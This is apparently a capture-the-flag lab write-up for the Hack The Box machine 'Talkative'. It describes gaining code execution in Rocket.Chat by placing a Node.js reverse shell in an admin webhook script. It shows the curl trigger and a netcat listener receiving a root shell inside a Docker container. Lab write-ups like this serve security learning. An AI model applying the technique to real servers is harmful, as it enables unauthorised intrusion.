Talkative_Lateral_Movement

WebHook Intergration

---

RCE can be achieved in Rocket.Chat as admin user

This is done though the webhook integrations

Either of them works.Incoming WebHook or Outgoing WebHook

I will configure the basic fields for WebHook

Then WebHook script that includes a Node.js reverse shell

The highlighted part was appended to declare the variable require

Changes are saved

This is the generated WebHook, which I can call with curl

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ curl http://talkative.htb:3000/hooks/sWmRbDqbXptykmdoa/DsPSgN4o6BDqgMThi32t5uRQHCwaNxZTQsDTrH4krzWqaB8C
{"success":false}                                                                                                       

Triggering

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ nnc 7777
listening on [any] 7777 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.155] 46996
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
c150397ccd63
ifconfig
sh: 4: ifconfig: not found
hostname -I
172.17.0.3 

Foothold established to the Docker host, 172.17.0.3, as the root user